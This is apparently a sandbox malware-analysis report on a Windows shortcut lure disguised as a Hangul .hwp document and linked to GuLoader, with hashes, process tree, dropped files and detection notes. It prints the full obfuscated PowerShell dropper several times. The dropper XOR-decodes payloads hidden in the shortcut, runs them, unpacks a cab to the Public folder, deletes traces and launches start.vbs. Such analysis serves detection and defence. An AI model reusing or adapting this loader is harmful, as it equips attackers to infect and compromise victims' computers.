| File name: | 6d901221cb5162c190cce720726889ccb1f8435f5d71fb05614672497425e931 (submitted file name only; this hex string does not match the SHA256 of the analyzed file given below, so do not use it as the sample's hash) |
| Full analysis: | https://app.any.run/tasks/f75b8a62-ad8e-460a-b75e-3846928e028b |
| Verdict: | Malicious activity. Caveat for this run: both powershell.exe instances exited with code 1, no process executing the dropped start.vbs appears in the process list, and every recorded network connection is to a Microsoft/Akamai host marked whitelisted — the later GuLoader stages and any C2 were not observed in this task. The expand.exe output file carries the same MD5/SHA256 as its input, which is consistent with the dropped blob not having been a valid cabinet here. |
| Threats: | GuLoader is an advanced downloader written in shellcode. It is used by criminals to distribute other malware, notably trojans, on a large scale, and is infamous for its anti-detection and anti-analysis capabilities. The object analyzed in this task is the first-stage Windows shortcut (.lnk) lure, not the GuLoader shellcode itself: the shortcut carries a "hwp File" description and a ".hwp" icon to pose as a Hangul Word Processor document, and its command line runs cmd.exe /c powershell (with caret-obfuscated tokens and junk `<# #>` comments) that locates the shortcut by an exact file size (0x0349AE4F bytes) in the current directory or %TEMP%, carves two XOR-encoded blobs from the shortcut's own bytes (offset 0x1E76, 0x11A00 bytes, key 0x18, written to the shortcut path minus ".lnk" and executed; offset 0x13876, 0x13CDB bytes, key 0xC0, written to %PUBLIC%\Byimtb.cab), deletes the shortcut, expands the cab into %PUBLIC%\documents, deletes the cab, and runs %PUBLIC%\documents\start.vbs. Detection opportunities: cmd.exe → powershell.exe spawned from explorer.exe with a caret-laden command line, powershell.exe spawning expand.exe against a file under C:\Users\Public, and file writes to %PUBLIC%\documents followed by script execution. |
| Analysis date: | October 15, 2024, 00:51:54 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/octet-stream |
| File info: | MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Mon Jan 1 00:00:00 1601, mtime=Mon Jan 1 00:00:00 1601, atime=Mon Jan 1 00:00:00 1601, length=0, window=hidenormalshowminimized. Note: the three 1601-01-01 timestamps are zeroed FILETIME fields and length=0 is the shortcut's recorded target size, not the size of the .lnk file itself; the embedded PowerShell only locates and decodes the shortcut if the .lnk on disk is exactly 0x0349AE4F (55,160,399) bytes, so a truncated or re-saved copy will not detonate. |
| MD5: | A4A14A3845EB859FB58E4DC50B6407DD |
| SHA1: | 5FF1E26FD5626EB5CA65FB85F7F04EAF52E628C7 |
| SHA256: | 11C1947DE6A4BAD7C3C5B4A9A6870E2FB01BAC076C5AEBB4987060A9E133B3A3 |
| SSDEEP: | 6144:528/i5ppZHX905tJkLmk6S9QsW7yT3xCv7jLvcZbyV:KFtALk6ijGGMv7IbyV |
| .lnk | | | Windows Shortcut (100) |
|---|
| Flags: | Description, CommandArgs, IconFile, Unicode, ExpString, PreferEnvPath |
|---|---|
| FileAttributes: | (none) |
| TargetFileSize: | - |
| IconIndex: | (none) |
| RunWindow: | Show Minimized No Activate |
| HotKey: | (none) |
| Description: | hwp File |
| CommandLineArguments: | /c p^owe^rshe^l^l -windowstyle hidden function qrimnpVhAd{param($ByimtbmyEg,$kNeZQMhNGyPy,$EgbvteukmW,$HziPgoYBSPP,$LnMqRSoGrHUl);^<#remandment manifoldly#^> $GwkiDUHMjE=New-Object ^<#rashbuss unwinnable#^>System.IO.FileStream($ByimtbmyEg,^<#pachomian stremmas#^>[System.IO.FileMode]::Open,^<#snugify coordinateness#^>[System.IO.FileAccess]::Read);^<#stylet enomotarch#^> $GwkiDUHMjE.Seek($kNeZQMhNGyPy,^<#pentactinal amble#^>[System.IO.SeekOrigin]::Begin);^<#predisadvantage anisocratic#^> $cKTwlnwsNcq=New-Object ^<#unseducible nonperpendicularity#^>byte[] $EgbvteukmW;^<#coronadite spiraloid#^> $GwkiDUHMjE.Read($cKTwlnwsNcq,^<#uniformest ankylurethria#^>0,$EgbvteukmW);^<#tablespoonful tracking#^> $GwkiDUHMjE.Close();for($FOalSAHFmDqf=0;$FOalSAHFmDqf -lt $EgbvteukmW;$FOalSAHFmDqf++){$cKTwlnwsNcq[$FOalSAHFmDqf]=$cKTwlnwsNcq[$FOalSAHFmDqf] -bxor $HziPgoYBSPP;}sc ^<#aureoled herodiones#^> $LnMqRSoGrHUl ^<#gelidium mutualized#^> $cKTwlnwsNcq -Encoding ^<#teliosporiferous nonjurying#^> Byte;};function sITqPCecquhp{param($XufbRmnzTCYI);^<#txt splenectama#^> $OWiCCpWxFZLj=Get-ChildItem ^<#invigilator pastiness#^>-Path ^<#humified flocculant#^> $XufbRmnzTCYI -Recurse ^<#overlaness satellite#^>*.lnk ^<#pomster hitlerism#^>^| ^<#sailyard ideologue#^>where-object ^<#stotterel sinkable#^>{$_.length ^<#serbonian prenominated#^>-eq 0x0349AE4F} ^<#indemonstrability oralogist#^>^| Select-Object ^<#electrobrasser flambage#^>-ExpandProperty ^<#contacted fishhouse#^>FullName; return ^<#orhamwood countertouch#^> $OWiCCpWxFZLj;^<#zoophysical provingly#^>};$qEHFgOjaYnK=Get-Location;$qkoFVypQqMha=sITqPCecquhp ^<#uncriticism oglers#^>-XufbRmnzTCYI ^<#breakage noncarbonate#^> $qEHFgOjaYnK;if($qkoFVypQqMha.length^<#macroscopical crosshatch#^> -eq 0){$qkoFVypQqMha=sITqPCecquhp ^<#cosmo subheadings#^> -XufbRmnzTCYI $env:Temp;} $qEHFgOjaYnK=Split-Path ^<#overmelted overdiluting#^> $qkoFVypQqMha;$TvRfwPBxWW = $qkoFVypQqMha.substring(0,$qkoFVypQqMha.length-4) 
^<#pharmacosiderite antimasker#^>+ '';qrimnpVhAd -ByimtbmyEg ^<#dextrotartaric sarcococca#^> $qkoFVypQqMha -kNeZQMhNGyPy ^<#trochars modelist#^> 0x00001E76 -EgbvteukmW 0x00011A00 -HziPgoYBSPP ^<#uncongestive achieve#^> 0x18 -LnMqRSoGrHUl ^<#visaing aglaozonia#^> $TvRfwPBxWW;^&^<#symplesite lysis#^> $TvRfwPBxWW;$pARWiRFyWslt=$env:public ^<#underpriced colligible#^>+ '\' ^<#hunger uncovers#^>+^<#superhelix imprudent#^> 'Byimtb.cab';qrimnpVhAd -ByimtbmyEg ^<#picturedom yieldable#^> $qkoFVypQqMha -kNeZQMhNGyPy ^<#commutable irrelevancies#^> 0x00013876 -EgbvteukmW ^<#uneviscerated moorman#^> 0x00013CDB -HziPgoYBSPP ^<#waterworm hubba#^> 0xC0 -LnMqRSoGrHUl ^<#unmaudlinly inculpatory#^> $pARWiRFyWslt;Remove-Item -Path ^<#egracias underproduction#^> $qkoFVypQqMha -Force;expand $pARWiRFyWslt ^<#thomistical noster#^> -F:* ^<#auger involucred#^> ($env:public ^<#punting capita#^>+^<#definitions coalescent#^> '\' ^<#moneymakers doggrelize#^>+^<#hicks antirestoration#^> 'documents');remove-item ^<#acieration impracticalness#^> -path ^<#supernaturalised shielings#^> $pARWiRFyWslt ^<#cassius starosty#^>-force;$TdtCmdVzpdm=$env:public^<#caprin utopists#^>+'\documents\start.vbs';^&^<#fatherkin unflared#^> $TdtCmdVzpdm; |
| IconFileName: | .hwp |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1336 | powershell -windowstyle hidden function qrimnpVhAd{param($ByimtbmyEg,$kNeZQMhNGyPy,$EgbvteukmW,$HziPgoYBSPP,$LnMqRSoGrHUl);<#remandment manifoldly#> $GwkiDUHMjE=New-Object <#rashbuss unwinnable#>System.IO.FileStream($ByimtbmyEg,<#pachomian stremmas#>[System.IO.FileMode]::Open,<#snugify coordinateness#>[System.IO.FileAccess]::Read);<#stylet enomotarch#> $GwkiDUHMjE.Seek($kNeZQMhNGyPy,<#pentactinal amble#>[System.IO.SeekOrigin]::Begin);<#predisadvantage anisocratic#> $cKTwlnwsNcq=New-Object <#unseducible nonperpendicularity#>byte[] $EgbvteukmW;<#coronadite spiraloid#> $GwkiDUHMjE.Read($cKTwlnwsNcq,<#uniformest ankylurethria#>0,$EgbvteukmW);<#tablespoonful tracking#> $GwkiDUHMjE.Close();for($FOalSAHFmDqf=0;$FOalSAHFmDqf -lt $EgbvteukmW;$FOalSAHFmDqf++){$cKTwlnwsNcq[$FOalSAHFmDqf]=$cKTwlnwsNcq[$FOalSAHFmDqf] -bxor $HziPgoYBSPP;}sc <#aureoled herodiones#> $LnMqRSoGrHUl <#gelidium mutualized#> $cKTwlnwsNcq -Encoding <#teliosporiferous nonjurying#> Byte;};function sITqPCecquhp{param($XufbRmnzTCYI);<#txt splenectama#> $OWiCCpWxFZLj=Get-ChildItem <#invigilator pastiness#>-Path <#humified flocculant#> $XufbRmnzTCYI -Recurse <#overlaness satellite#>*.lnk <#pomster hitlerism#>| <#sailyard ideologue#>where-object <#stotterel sinkable#>{$_.length <#serbonian prenominated#>-eq 0x0349AE4F} <#indemonstrability oralogist#>| Select-Object <#electrobrasser flambage#>-ExpandProperty <#contacted fishhouse#>FullName; return <#orhamwood countertouch#> $OWiCCpWxFZLj;<#zoophysical provingly#>};$qEHFgOjaYnK=Get-Location;$qkoFVypQqMha=sITqPCecquhp <#uncriticism oglers#>-XufbRmnzTCYI <#breakage noncarbonate#> $qEHFgOjaYnK;if($qkoFVypQqMha.length<#macroscopical crosshatch#> -eq 0){$qkoFVypQqMha=sITqPCecquhp <#cosmo subheadings#> -XufbRmnzTCYI $env:Temp;} $qEHFgOjaYnK=Split-Path <#overmelted overdiluting#> $qkoFVypQqMha;$TvRfwPBxWW = $qkoFVypQqMha.substring(0,$qkoFVypQqMha.length-4) <#pharmacosiderite antimasker#>+ '';qrimnpVhAd -ByimtbmyEg <#dextrotartaric sarcococca#> $qkoFVypQqMha 
-kNeZQMhNGyPy <#trochars modelist#> 0x00001E76 -EgbvteukmW 0x00011A00 -HziPgoYBSPP <#uncongestive achieve#> 0x18 -LnMqRSoGrHUl <#visaing aglaozonia#> $TvRfwPBxWW;&<#symplesite lysis#> $TvRfwPBxWW;$pARWiRFyWslt=$env:public <#underpriced colligible#>+ '\' <#hunger uncovers#>+<#superhelix imprudent#> 'Byimtb.cab';qrimnpVhAd -ByimtbmyEg <#picturedom yieldable#> $qkoFVypQqMha -kNeZQMhNGyPy <#commutable irrelevancies#> 0x00013876 -EgbvteukmW <#uneviscerated moorman#> 0x00013CDB -HziPgoYBSPP <#waterworm hubba#> 0xC0 -LnMqRSoGrHUl <#unmaudlinly inculpatory#> $pARWiRFyWslt;Remove-Item -Path <#egracias underproduction#> $qkoFVypQqMha -Force;expand $pARWiRFyWslt <#thomistical noster#> -F:* <#auger involucred#> ($env:public <#punting capita#>+<#definitions coalescent#> '\' <#moneymakers doggrelize#>+<#hicks antirestoration#> 'documents');remove-item <#acieration impracticalness#> -path <#supernaturalised shielings#> $pARWiRFyWslt <#cassius starosty#>-force;$TdtCmdVzpdm=$env:public<#caprin utopists#>+'\documents\start.vbs';&<#fatherkin unflared#> $TdtCmdVzpdm; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3028 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6404 | "C:\WINDOWS\system32\cmd.exe" /c p^owe^rshe^l^l -windowstyle hidden function qrimnpVhAd{param($ByimtbmyEg,$kNeZQMhNGyPy,$EgbvteukmW,$HziPgoYBSPP,$LnMqRSoGrHUl);^<#remandment manifoldly#^> $GwkiDUHMjE=New-Object ^<#rashbuss unwinnable#^>System.IO.FileStream($ByimtbmyEg,^<#pachomian stremmas#^>[System.IO.FileMode]::Open,^<#snugify coordinateness#^>[System.IO.FileAccess]::Read);^<#stylet enomotarch#^> $GwkiDUHMjE.Seek($kNeZQMhNGyPy,^<#pentactinal amble#^>[System.IO.SeekOrigin]::Begin);^<#predisadvantage anisocratic#^> $cKTwlnwsNcq=New-Object ^<#unseducible nonperpendicularity#^>byte[] $EgbvteukmW;^<#coronadite spiraloid#^> $GwkiDUHMjE.Read($cKTwlnwsNcq,^<#uniformest ankylurethria#^>0,$EgbvteukmW);^<#tablespoonful tracking#^> $GwkiDUHMjE.Close();for($FOalSAHFmDqf=0;$FOalSAHFmDqf -lt $EgbvteukmW;$FOalSAHFmDqf++){$cKTwlnwsNcq[$FOalSAHFmDqf]=$cKTwlnwsNcq[$FOalSAHFmDqf] -bxor $HziPgoYBSPP;}sc ^<#aureoled herodiones#^> $LnMqRSoGrHUl ^<#gelidium mutualized#^> $cKTwlnwsNcq -Encoding ^<#teliosporiferous nonjurying#^> Byte;};function sITqPCecquhp{param($XufbRmnzTCYI);^<#txt splenectama#^> $OWiCCpWxFZLj=Get-ChildItem ^<#invigilator pastiness#^>-Path ^<#humified flocculant#^> $XufbRmnzTCYI -Recurse ^<#overlaness satellite#^>*.lnk ^<#pomster hitlerism#^>^| ^<#sailyard ideologue#^>where-object ^<#stotterel sinkable#^>{$_.length ^<#serbonian prenominated#^>-eq 0x0349AE4F} ^<#indemonstrability oralogist#^>^| Select-Object ^<#electrobrasser flambage#^>-ExpandProperty ^<#contacted fishhouse#^>FullName; return ^<#orhamwood countertouch#^> $OWiCCpWxFZLj;^<#zoophysical provingly#^>};$qEHFgOjaYnK=Get-Location;$qkoFVypQqMha=sITqPCecquhp ^<#uncriticism oglers#^>-XufbRmnzTCYI ^<#breakage noncarbonate#^> $qEHFgOjaYnK;if($qkoFVypQqMha.length^<#macroscopical crosshatch#^> -eq 0){$qkoFVypQqMha=sITqPCecquhp ^<#cosmo subheadings#^> -XufbRmnzTCYI $env:Temp;} $qEHFgOjaYnK=Split-Path ^<#overmelted overdiluting#^> $qkoFVypQqMha;$TvRfwPBxWW = $qkoFVypQqMha.substring(0,$qkoFVypQqMha.length-4) 
^<#pharmacosiderite antimasker#^>+ '';qrimnpVhAd -ByimtbmyEg ^<#dextrotartaric sarcococca#^> $qkoFVypQqMha -kNeZQMhNGyPy ^<#trochars modelist#^> 0x00001E76 -EgbvteukmW 0x00011A00 -HziPgoYBSPP ^<#uncongestive achieve#^> 0x18 -LnMqRSoGrHUl ^<#visaing aglaozonia#^> $TvRfwPBxWW;^&^<#symplesite lysis#^> $TvRfwPBxWW;$pARWiRFyWslt=$env:public ^<#underpriced colligible#^>+ '\' ^<#hunger uncovers#^>+^<#superhelix imprudent#^> 'Byimtb.cab';qrimnpVhAd -ByimtbmyEg ^<#picturedom yieldable#^> $qkoFVypQqMha -kNeZQMhNGyPy ^<#commutable irrelevancies#^> 0x00013876 -EgbvteukmW ^<#uneviscerated moorman#^> 0x00013CDB -HziPgoYBSPP ^<#waterworm hubba#^> 0xC0 -LnMqRSoGrHUl ^<#unmaudlinly inculpatory#^> $pARWiRFyWslt;Remove-Item -Path ^<#egracias underproduction#^> $qkoFVypQqMha -Force;expand $pARWiRFyWslt ^<#thomistical noster#^> -F:* ^<#auger involucred#^> ($env:public ^<#punting capita#^>+^<#definitions coalescent#^> '\' ^<#moneymakers doggrelize#^>+^<#hicks antirestoration#^> 'documents');remove-item ^<#acieration impracticalness#^> -path ^<#supernaturalised shielings#^> $pARWiRFyWslt ^<#cassius starosty#^>-force;$TdtCmdVzpdm=$env:public^<#caprin utopists#^>+'\documents\start.vbs';^&^<#fatherkin unflared#^> $TdtCmdVzpdm; | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6668 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6696 | "C:\WINDOWS\system32\cmd.exe" /c p^owe^rshe^l^l -windowstyle hidden function qrimnpVhAd{param($ByimtbmyEg,$kNeZQMhNGyPy,$EgbvteukmW,$HziPgoYBSPP,$LnMqRSoGrHUl);^<#remandment manifoldly#^> $GwkiDUHMjE=New-Object ^<#rashbuss unwinnable#^>System.IO.FileStream($ByimtbmyEg,^<#pachomian stremmas#^>[System.IO.FileMode]::Open,^<#snugify coordinateness#^>[System.IO.FileAccess]::Read);^<#stylet enomotarch#^> $GwkiDUHMjE.Seek($kNeZQMhNGyPy,^<#pentactinal amble#^>[System.IO.SeekOrigin]::Begin);^<#predisadvantage anisocratic#^> $cKTwlnwsNcq=New-Object ^<#unseducible nonperpendicularity#^>byte[] $EgbvteukmW;^<#coronadite spiraloid#^> $GwkiDUHMjE.Read($cKTwlnwsNcq,^<#uniformest ankylurethria#^>0,$EgbvteukmW);^<#tablespoonful tracking#^> $GwkiDUHMjE.Close();for($FOalSAHFmDqf=0;$FOalSAHFmDqf -lt $EgbvteukmW;$FOalSAHFmDqf++){$cKTwlnwsNcq[$FOalSAHFmDqf]=$cKTwlnwsNcq[$FOalSAHFmDqf] -bxor $HziPgoYBSPP;}sc ^<#aureoled herodiones#^> $LnMqRSoGrHUl ^<#gelidium mutualized#^> $cKTwlnwsNcq -Encoding ^<#teliosporiferous nonjurying#^> Byte;};function sITqPCecquhp{param($XufbRmnzTCYI);^<#txt splenectama#^> $OWiCCpWxFZLj=Get-ChildItem ^<#invigilator pastiness#^>-Path ^<#humified flocculant#^> $XufbRmnzTCYI -Recurse ^<#overlaness satellite#^>*.lnk ^<#pomster hitlerism#^>^| ^<#sailyard ideologue#^>where-object ^<#stotterel sinkable#^>{$_.length ^<#serbonian prenominated#^>-eq 0x0349AE4F} ^<#indemonstrability oralogist#^>^| Select-Object ^<#electrobrasser flambage#^>-ExpandProperty ^<#contacted fishhouse#^>FullName; return ^<#orhamwood countertouch#^> $OWiCCpWxFZLj;^<#zoophysical provingly#^>};$qEHFgOjaYnK=Get-Location;$qkoFVypQqMha=sITqPCecquhp ^<#uncriticism oglers#^>-XufbRmnzTCYI ^<#breakage noncarbonate#^> $qEHFgOjaYnK;if($qkoFVypQqMha.length^<#macroscopical crosshatch#^> -eq 0){$qkoFVypQqMha=sITqPCecquhp ^<#cosmo subheadings#^> -XufbRmnzTCYI $env:Temp;} $qEHFgOjaYnK=Split-Path ^<#overmelted overdiluting#^> $qkoFVypQqMha;$TvRfwPBxWW = $qkoFVypQqMha.substring(0,$qkoFVypQqMha.length-4) 
^<#pharmacosiderite antimasker#^>+ '';qrimnpVhAd -ByimtbmyEg ^<#dextrotartaric sarcococca#^> $qkoFVypQqMha -kNeZQMhNGyPy ^<#trochars modelist#^> 0x00001E76 -EgbvteukmW 0x00011A00 -HziPgoYBSPP ^<#uncongestive achieve#^> 0x18 -LnMqRSoGrHUl ^<#visaing aglaozonia#^> $TvRfwPBxWW;^&^<#symplesite lysis#^> $TvRfwPBxWW;$pARWiRFyWslt=$env:public ^<#underpriced colligible#^>+ '\' ^<#hunger uncovers#^>+^<#superhelix imprudent#^> 'Byimtb.cab';qrimnpVhAd -ByimtbmyEg ^<#picturedom yieldable#^> $qkoFVypQqMha -kNeZQMhNGyPy ^<#commutable irrelevancies#^> 0x00013876 -EgbvteukmW ^<#uneviscerated moorman#^> 0x00013CDB -HziPgoYBSPP ^<#waterworm hubba#^> 0xC0 -LnMqRSoGrHUl ^<#unmaudlinly inculpatory#^> $pARWiRFyWslt;Remove-Item -Path ^<#egracias underproduction#^> $qkoFVypQqMha -Force;expand $pARWiRFyWslt ^<#thomistical noster#^> -F:* ^<#auger involucred#^> ($env:public ^<#punting capita#^>+^<#definitions coalescent#^> '\' ^<#moneymakers doggrelize#^>+^<#hicks antirestoration#^> 'documents');remove-item ^<#acieration impracticalness#^> -path ^<#supernaturalised shielings#^> $pARWiRFyWslt ^<#cassius starosty#^>-force;$TdtCmdVzpdm=$env:public^<#caprin utopists#^>+'\documents\start.vbs';^&^<#fatherkin unflared#^> $TdtCmdVzpdm; | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6708 | "C:\WINDOWS\system32\expand.exe" C:\Users\Public\Byimtb.cab -F:* C:\Users\Public\documents | C:\Windows\System32\expand.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: LZ Expansion Utility Exit code: 0 Version: 5.00 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6712 | powershell -windowstyle hidden function qrimnpVhAd{param($ByimtbmyEg,$kNeZQMhNGyPy,$EgbvteukmW,$HziPgoYBSPP,$LnMqRSoGrHUl);<#remandment manifoldly#> $GwkiDUHMjE=New-Object <#rashbuss unwinnable#>System.IO.FileStream($ByimtbmyEg,<#pachomian stremmas#>[System.IO.FileMode]::Open,<#snugify coordinateness#>[System.IO.FileAccess]::Read);<#stylet enomotarch#> $GwkiDUHMjE.Seek($kNeZQMhNGyPy,<#pentactinal amble#>[System.IO.SeekOrigin]::Begin);<#predisadvantage anisocratic#> $cKTwlnwsNcq=New-Object <#unseducible nonperpendicularity#>byte[] $EgbvteukmW;<#coronadite spiraloid#> $GwkiDUHMjE.Read($cKTwlnwsNcq,<#uniformest ankylurethria#>0,$EgbvteukmW);<#tablespoonful tracking#> $GwkiDUHMjE.Close();for($FOalSAHFmDqf=0;$FOalSAHFmDqf -lt $EgbvteukmW;$FOalSAHFmDqf++){$cKTwlnwsNcq[$FOalSAHFmDqf]=$cKTwlnwsNcq[$FOalSAHFmDqf] -bxor $HziPgoYBSPP;}sc <#aureoled herodiones#> $LnMqRSoGrHUl <#gelidium mutualized#> $cKTwlnwsNcq -Encoding <#teliosporiferous nonjurying#> Byte;};function sITqPCecquhp{param($XufbRmnzTCYI);<#txt splenectama#> $OWiCCpWxFZLj=Get-ChildItem <#invigilator pastiness#>-Path <#humified flocculant#> $XufbRmnzTCYI -Recurse <#overlaness satellite#>*.lnk <#pomster hitlerism#>| <#sailyard ideologue#>where-object <#stotterel sinkable#>{$_.length <#serbonian prenominated#>-eq 0x0349AE4F} <#indemonstrability oralogist#>| Select-Object <#electrobrasser flambage#>-ExpandProperty <#contacted fishhouse#>FullName; return <#orhamwood countertouch#> $OWiCCpWxFZLj;<#zoophysical provingly#>};$qEHFgOjaYnK=Get-Location;$qkoFVypQqMha=sITqPCecquhp <#uncriticism oglers#>-XufbRmnzTCYI <#breakage noncarbonate#> $qEHFgOjaYnK;if($qkoFVypQqMha.length<#macroscopical crosshatch#> -eq 0){$qkoFVypQqMha=sITqPCecquhp <#cosmo subheadings#> -XufbRmnzTCYI $env:Temp;} $qEHFgOjaYnK=Split-Path <#overmelted overdiluting#> $qkoFVypQqMha;$TvRfwPBxWW = $qkoFVypQqMha.substring(0,$qkoFVypQqMha.length-4) <#pharmacosiderite antimasker#>+ '';qrimnpVhAd -ByimtbmyEg <#dextrotartaric sarcococca#> $qkoFVypQqMha 
-kNeZQMhNGyPy <#trochars modelist#> 0x00001E76 -EgbvteukmW 0x00011A00 -HziPgoYBSPP <#uncongestive achieve#> 0x18 -LnMqRSoGrHUl <#visaing aglaozonia#> $TvRfwPBxWW;&<#symplesite lysis#> $TvRfwPBxWW;$pARWiRFyWslt=$env:public <#underpriced colligible#>+ '\' <#hunger uncovers#>+<#superhelix imprudent#> 'Byimtb.cab';qrimnpVhAd -ByimtbmyEg <#picturedom yieldable#> $qkoFVypQqMha -kNeZQMhNGyPy <#commutable irrelevancies#> 0x00013876 -EgbvteukmW <#uneviscerated moorman#> 0x00013CDB -HziPgoYBSPP <#waterworm hubba#> 0xC0 -LnMqRSoGrHUl <#unmaudlinly inculpatory#> $pARWiRFyWslt;Remove-Item -Path <#egracias underproduction#> $qkoFVypQqMha -Force;expand $pARWiRFyWslt <#thomistical noster#> -F:* <#auger involucred#> ($env:public <#punting capita#>+<#definitions coalescent#> '\' <#moneymakers doggrelize#>+<#hicks antirestoration#> 'documents');remove-item <#acieration impracticalness#> -path <#supernaturalised shielings#> $pARWiRFyWslt <#cassius starosty#>-force;$TdtCmdVzpdm=$env:public<#caprin utopists#>+'\documents\start.vbs';&<#fatherkin unflared#> $TdtCmdVzpdm; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7060 | "C:\WINDOWS\system32\expand.exe" C:\Users\Public\Byimtb.cab -F:* C:\Users\Public\documents | C:\Windows\System32\expand.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: LZ Expansion Utility Exit code: 0 Version: 5.00 (WinBuild.160101.0800) Modules
| |||||||||||||||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1336 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_j1etymgq.41x.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6712 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:CA7DB8FD88E3D920A0274FF7B9F0023E | SHA256:4F411D3BD5A7415A42C3818E083FE8C4839C6608CAD0A2FFD096CB03A7D5AE78 | |||
| 6712 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0xtkx5wm.shq.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6712 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_u1ye5m4u.gvf.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1336 | powershell.exe | C:\Users\Public\Byimtb.cab | text | |
MD5:4CEF02F8AD2313769B94A5D94C1D264F | SHA256:2DB3025D97642FE7E305BBDF7D11CFCD507B4863D2EB173A856C5A4378E13BC2 | |||
| 7060 | expand.exe | C:\Users\Public\Documents\byimtb.cab | text | |
MD5:4CEF02F8AD2313769B94A5D94C1D264F | SHA256:2DB3025D97642FE7E305BBDF7D11CFCD507B4863D2EB173A856C5A4378E13BC2 | |||
| 1336 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_btf10r31.3my.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6712 | powershell.exe | C:\Users\Public\Byimtb.cab | text | |
MD5:4CEF02F8AD2313769B94A5D94C1D264F | SHA256:2DB3025D97642FE7E305BBDF7D11CFCD507B4863D2EB173A856C5A4378E13BC2 | |||
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
6944 | svchost.exe | 52.140.118.28:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IN | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 52.140.118.28:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IN | whitelisted |
— | — | 2.23.209.130:443 | www.bing.com | Akamai International B.V. | GB | whitelisted |
4360 | SearchApp.exe | 2.23.209.187:443 | www.bing.com | Akamai International B.V. | GB | whitelisted |
— | — | 20.106.86.13:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
5488 | MoUsoCoreWorker.exe | 20.106.86.13:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
4020 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
816 | svchost.exe | 20.106.86.13:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
google.com |
| whitelisted |